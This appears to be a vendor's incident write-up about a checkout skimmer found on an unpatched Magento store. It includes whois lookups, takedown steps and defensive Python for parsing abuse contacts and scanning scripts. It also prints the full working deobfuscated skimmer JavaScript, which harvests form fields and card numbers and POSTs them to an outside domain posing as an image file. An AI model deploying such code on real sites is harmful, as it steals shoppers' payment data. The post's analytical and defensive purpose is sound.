Why you should install Magento security patches [Fraud investigation]

Today we faced a serious fraud situation. At first sight it was a typical one, but it also looked like an attempt to damage Amasty's reputation. First of all, though, it is a live example of how e-commerce fraud works when users neglect security rules.

We are publishing this story to show our clients and all Magento merchants how important it is to install security patches promptly.

This morning we got a message from a hosting company.

[Image: initial report about the fraud]

It was the hosting company's employee, not the Magento site owner, who sent us the script. It collects payment data from the Magento checkout pages and sends it to https://amasty.biz/lib/paypal_icon.png.

As we are not associated with amasty.biz in any way, we of course confirmed that the script was malware and suggested deleting it from the website.

Amasty.biz redirects to amasty.com. It may look as if we are somehow connected to amasty.biz, but we want to officially state once again: Amasty is not related to the amasty.biz fraud in any way.

WHOIS lookup of amasty.biz is not helpful:

$ whois amasty.biz
Domain Name:                                 AMASTY.BIZ
Domain ID:                                   D70130289-BIZ
Sponsoring Registrar:                        EVOPLUS LTD.
Sponsoring Registrar IANA ID:                1418
Registrar URL (registration services):       www.evonames.com
Domain Status:                               ok
Variant:                                     AMASTY.BIZ
Registrant ID:                               MR_8788991WP
Registrant Name:                             WhoisProtectService.net
Registrant Address1:                         27 Old Gloucester Street
Registrant City:                             London
Registrant Postal Code:                      WC1N 3AX
Registrant Country:                          UNITED KINGDOM
Registrant Country Code:                     GB
Registrant Phone Number:                     +44.02074195061
Registrant Email:                            amasty.biz@whoisprotectservice.net
Administrative Contact ID:                   MR_8788991WP
Administrative Contact Name:                 WhoisProtectService.net
Administrative Contact Address1:             27 Old Gloucester Street
Administrative Contact City:                 London
Administrative Contact Postal Code:          WC1N 3AX
Administrative Contact Country:              UNITED KINGDOM
Administrative Contact Country Code:         GB
Administrative Contact Phone Number:         +44.02074195061
Administrative Contact Email:                amasty.biz@whoisprotectservice.net
Billing Contact ID:                          MR_8788991WP
Billing Contact Name:                        WhoisProtectService.net
Billing Contact Address1:                    27 Old Gloucester Street
Billing Contact City:                        London
Billing Contact Postal Code:                 WC1N 3AX
Billing Contact Country:                     UNITED KINGDOM
Billing Contact Country Code:                GB
Billing Contact Phone Number:                +44.02074195061
Billing Contact Email:                       amasty.biz@whoisprotectservice.net
Technical Contact ID:                        MR_8788991WP
Technical Contact Name:                      WhoisProtectService.net
Technical Contact Address1:                  27 Old Gloucester Street
Technical Contact City:                      London
Technical Contact Postal Code:               WC1N 3AX
Technical Contact Country:                   UNITED KINGDOM
Technical Contact Country Code:              GB
Technical Contact Phone Number:              +44.02074195061
Technical Contact Email:                     amasty.biz@whoisprotectservice.net
Name Server:                                 NS1.TOPDNS.ME
Name Server:                                 NS2.TOPDNS.ME
Name Server:                                 NS3.TOPDNS.ME
Created by Registrar:                        EVOPLUS LTD.
Last Updated by Registrar:                   EVOPLUS LTD.
Domain Registration Date:                    Fri Jun 03 11:00:12 GMT 2016
Domain Expiration Date:                      Fri Jun 02 23:59:59 GMT 2017
Domain Last Updated Date:                    Sat Jun 04 04:13:19 GMT 2016
DNSSEC:                                      false

That’s because the owner chose WHOIS privacy protection when registering the domain. Right now we are trying to reach the registrar to have the domain frozen, but we also wanted to neutralize the site that is collecting the payment data.

We checked the IP address and the hosting company the fraud site uses:

$ nslookup amasty.biz 8.8.8.8
Server:      8.8.8.8
Address:     8.8.8.8#53
Non-authoritative answer:
Name:  amasty.biz
Address: 209.126.123.253

Now we know that the amasty.biz IP address is 209.126.123.253:

$ whois 209.126.123.253
NetRange: 209.126.96.0 - 209.126.127.255
CIDR: 209.126.96.0/19
NetName: S4Y-7
NetHandle: NET-209-126-96-0-1
Parent: NET209 (NET-209-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS30083
Organization: server4you Inc. (SERVE-6)
RegDate: 2013-12-26
Updated: 2016-03-19
Ref: https://whois.arin.net/rest/net/NET-209-126-96-0-1
OrgName: server4you Inc.
OrgId: SERVE-6
Address: 210 North Tucker Blvd.
Address: Suite 910
City: Saint Louis
StateProv: MO
PostalCode: 63101
Country: US
RegDate: 2003-04-15
Updated: 2016-05-25
Ref: https://whois.arin.net/rest/org/SERVE-6
OrgAbuseHandle: SAD112-ARIN
OrgAbuseName: server4you Abuse Department
OrgAbusePhone: +1-314-266-3638
OrgAbuseEmail: abuse@server4you.com
OrgAbuseRef: https://whois.arin.net/rest/poc/SAD112-ARIN

As we see here, the IP is owned by server4you Inc. We tried to reach the hosting company via abuse@server4you.com and asked them to take the site down because of the fraud. So far we have not received any response, but we did everything we could here.
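The steps above (resolve the domain, look up the IP's netblock, mail the abuse contact) are something an incident responder repeats for every collection server they find. The following is an added example, not Amasty's or any whois tool's code: a small parser for the ARIN-style "Key: value" record quoted above that returns the abuse contact and the netblock it is responsible for, handling repeated keys such as Address and refusing to guess when no abuse address is present. The sample record is the whois output quoted on this page, pasted in so the example runs offline.

```python
"""Added example (not Amasty's code): extract the netblock and abuse contact
from an ARIN-style "Key: value" whois record, so the notification target for
a takedown request is derived the same way every time."""
import re

LINE_RE = re.compile(r"^([A-Za-z]+):\s*(.*?)\s*$")

# The IP whois record quoted above, pasted in so the example runs offline.
WHOIS_IP_RECORD = """\
NetRange: 209.126.96.0 - 209.126.127.255
CIDR: 209.126.96.0/19
NetName: S4Y-7
OriginAS: AS30083
Organization: server4you Inc. (SERVE-6)
OrgName: server4you Inc.
Address: 210 North Tucker Blvd.
Address: Suite 910
City: Saint Louis
Country: US
OrgAbuseHandle: SAD112-ARIN
OrgAbuseName: server4you Abuse Department
OrgAbusePhone: +1-314-266-3638
OrgAbuseEmail: abuse@server4you.com
"""


def parse_whois(text):
    """Parse "Key: value" lines into a dict of lists; repeated keys (Address)
    keep every value in order, and lines without a key are ignored."""
    rec = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank lines, comments and continuation text are skipped
        key, value = m.groups()
        rec.setdefault(key, []).append(value)
    return rec


def takedown_contact(text):
    """Return whom to notify and which range they answer for, or None when
    the record carries no abuse e-mail, so a caller never mails the wrong party."""
    rec = parse_whois(text)
    email = rec.get("OrgAbuseEmail") or rec.get("AbuseEmail")
    if not email:
        return None

    def first(key):
        return (rec.get(key) or [None])[0]

    return {
        "email": email[0],
        "phone": first("OrgAbusePhone"),
        "org": first("OrgName"),
        "cidr": first("CIDR"),
        "asn": first("OriginAS"),
    }


if __name__ == "__main__":
    print(takedown_contact(WHOIS_IP_RECORD))
```

Keeping the CIDR and ASN next to the e-mail address matters when the abuse desk asks which range the complaint concerns; quoting them from the same record avoids transcription mistakes in the report.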

To investigate further, we checked the main page code of the affected site and saw the following part:

[Image: fraud JS code as found in the page source]

The script is obfuscated, but we do have the deobfuscated version (to get the deobfuscated variant, replace this['eval'](w); in the loader with console.log(w); so that the unpacked code is printed instead of executed):

// Deobfuscated skimmer exactly as captured on the affected site; its own
// defects (the 'slect' typo, snd starting out as null) are left untouched.
var snd = null;

// Only activate on URLs that look like a checkout page.
function start() {
    if ((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) {
        send();
    }
}
document.addEventListener("DOMContentLoaded", start);

// Copy every filled-in field as id=value into the buffer.
function clk() {
    var inp = document.querySelectorAll("input, select, textarea, checkbox");
    for (var i = 0; i < inp.length; i++) {
        if (inp[i].value.length > 0) {
            var nme = inp[i].id;
            if (nme == '') { nme = i; }
            snd += inp[i].id + '=' + inp[i].value + '&';
        }
    }
}

// Hook every button and form, then flush the buffer to the collection
// server and reschedule itself every 130 ms.
function send() {
    var btn = document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
    for (var i = 0; i < btn.length; i++) {
        var b = btn[i];
        if (b.type != 'text' && b.type != 'slect' && b.type != 'checkbox' && b.type != 'password' && b.type != 'radio') {
            if (b.addEventListener) {
                b.addEventListener("click", clk, false);
            } else {
                b.attachEvent('onclick', clk);
            }
        }
    }

    var frm = document.querySelectorAll("form");
    for (var i = 0; i < frm.length; i++) {
        if (frm[i].addEventListener) {
            frm[i].addEventListener("submit", clk, false);
        } else {
            frm[i].attachEvent('onsubmit', clk);
        }
    }

    if (snd != null) {
        // Flag the batch when it contains something that looks like a card number.
        var cc = new RegExp("[0-9]{13,16}");
        var asd = "0";
        if (cc.test(snd)) {
            asd = "1";
        }
        var http = new XMLHttpRequest();
        http.open("POST", "https://amasty.biz/lib/paypal_icon.jpg", true);
        http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        http.send("data=" + snd + "&asd=" + asd + "&id_id=magentosite");
    }
    snd = null;
    setTimeout('send()', 130);
}
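The skimmer above has a recognisable shape: a checkout-page URL test, a sweep over every input field, a card-number regex, a POST to a foreign host whose path pretends to be an image, and, in the live sample, a self-decoding this['eval'](w) loader wrapped around all of it. The following is an added example, not Amasty's, Magento's or magereport.com's code: a scanner that takes a saved copy of a storefront page, scores each inline script against those indicators and flags the ones worth a look, plus a helper that applies the deobfuscation trick described above (eval replaced by console.log) so an analyst can print the unpacked stage in a throwaway browser or Node sandbox. The sample HTML, the host names shop.example and collector.example and the threshold of 4 are all constructed for this example; it goes a little beyond the page's single sample by also catching the obfuscated loader form, which the plain-text indicators alone would miss.

```python
"""Added example (not Amasty's or Magento's code): score the inline scripts
of a saved storefront page against the indicators of the checkout skimmer
discussed on this page, and stage an obfuscated loader for safe inspection."""
import re
from urllib.parse import urlparse

# Indicators lifted from the deobfuscated skimmer.
CHECKOUT_RE = re.compile(
    r"onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout", re.I)
HARVEST_RE = re.compile(
    r"""querySelectorAll\s*\(\s*['"][^'"]*\b(?:input|select|textarea)\b""", re.I)
XHR_POST_RE = re.compile(
    r"""\.open\s*\(\s*['"]POST['"]\s*,\s*['"](https?://[^'"]+)['"]""", re.I)
CARD_RE = re.compile(r"""RegExp\s*\(\s*['"]""" + re.escape("[0-9]{13,16}"))
IMAGE_EXT_RE = re.compile(r"\.(?:png|jpe?g|gif)$", re.I)
# The live sample unpacked itself through this['eval'](w); these patterns
# catch that loader stage even when the payload text is unreadable.
EVAL_STAGE_RE = re.compile(r"""this\s*\[\s*['"]eval['"]\s*\]\s*\(\s*(\w+)\s*\)""")
OBFUSCATION_RE = re.compile(
    r"""this\s*\[\s*['"]eval['"]\s*\]|String\.fromCharCode|unescape\s*\(|(?:\\x[0-9a-f]{2}){8,}""",
    re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

SUSPICIOUS = 4  # review threshold chosen for this example


def inspect_script(src, site_host):
    """Return the indicators a single inline script exhibits, with a score."""
    external, image_post = set(), False
    for url in XHR_POST_RE.findall(src):
        parts = urlparse(url)
        if (parts.hostname or "").lower() != site_host.lower():
            external.add(parts.hostname)
            # POSTing form data to a ".jpg"/".png" path is how this skimmer
            # disguised its collection endpoint.
            if IMAGE_EXT_RE.search(parts.path):
                image_post = True
    f = {
        "checkout_targeting": bool(CHECKOUT_RE.search(src)),
        "harvests_inputs": bool(HARVEST_RE.search(src)),
        "card_number_regex": bool(CARD_RE.search(src)),
        "external_post_hosts": sorted(external),
        "post_to_image_url": image_post,
        "eval_loader": bool(OBFUSCATION_RE.search(src)),
    }
    f["score"] = score(f)
    return f


def score(f):
    """Weight the indicators; a POST leaving the storefront counts most, and a
    self-decoding eval stage is suspicious enough on its own to reach review."""
    s = 3 if f["external_post_hosts"] else 0
    s += 2 * sum(f[k] for k in ("post_to_image_url", "harvests_inputs",
                                 "checkout_targeting", "card_number_regex"))
    s += 4 if f["eval_loader"] else 0
    return s


def scan_page(html, site_host):
    """Return findings for every inline script at or above the threshold."""
    return [f for f in (inspect_script(m.group(1), site_host)
                        for m in SCRIPT_RE.finditer(html))
            if f["score"] >= SUSPICIOUS]


def stage_for_inspection(src):
    """Apply the page's deobfuscation trick: rewrite this['eval'](w) as
    console.log(w) so the unpacked payload is printed, not run, when the
    loader is executed in a disposable sandbox."""
    return EVAL_STAGE_RE.sub(r"console.log(\1)", src)


# Constructed sample page: a benign cart call to the shop's own host, a
# clear-text skimmer modelled on the one above, and an obfuscated loader.
SAMPLE_HTML = """
<html><body>
<script>
  var x = new XMLHttpRequest();
  x.open("POST", "https://shop.example/rest/V1/guest-carts", true);
  x.send("{}");
</script>
<script>
  function start(){ if((new RegExp('onestepcheckout|firecheckout')).test(window.location)) { send(); } }
  function clk(){ var inp=document.querySelectorAll("input, select, textarea"); }
  function send(){ var cc = new RegExp("[0-9]{13,16}");
    var http = new XMLHttpRequest();
    http.open("POST","https://collector.example/lib/paypal_icon.jpg",true);
    http.send("data=" + snd); }
</script>
<script>
  var w = String.fromCharCode(118,97,114); this['eval'](w);
</script>
</body></html>
"""

if __name__ == "__main__":
    for hit in scan_page(SAMPLE_HTML, "shop.example"):
        print(hit)
```

Run it against a copy of the live page source (not the files on disk alone, since a tampered template or a compromised theme file only shows up once rendered) with site_host set to the shop's own domain. The "onepage" indicator deserves care: legitimate Magento checkout code mentions it too, which is why a single match never reaches the threshold by itself and why an external POST destination carries the most weight.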


To find out why this happened, we checked the affected site with magereport.com.

[Image: magereport.com check of the affected site]

The report shows multiple vulnerabilities on the affected site because its owners haven’t installed a single Magento security patch. Pay attention to the Credit Card Hijack item that was detected.

The script from our case is very similar to the script example from the vulnerability description; the differences are the URL the data is sent to and the extended list of pages with payment data.

[Image: line-by-line difference between the two scripts]

Red lines are the lines that differ from the magereport.com example; green lines are the lines that differ from the script we found.

And, of course, the main victims of the fraud are the customers who enter their payment details on vulnerable sites.

Of course, Magento merchants can’t be 100% safe from such a situation, but the probability of fraud incidents can be significantly lowered by using strong passwords and installing Magento security patches as soon as they are released.

Check your site with magereport.com, and if your site is not safe, ask an Amasty professional to install Magento security patches for you.

UPD: The registrar confirmed that amasty.biz has been blocked.

Andrey Tataranovich

Andrei believes that only at work people can fully express themselves, so he does his best to implement all his knowledge while in the office. Having made computer science his hobby, Andrei is constantly developing his professional skills. But despite such a busy schedule he always finds time to read science fiction books and communicate with new interesting people.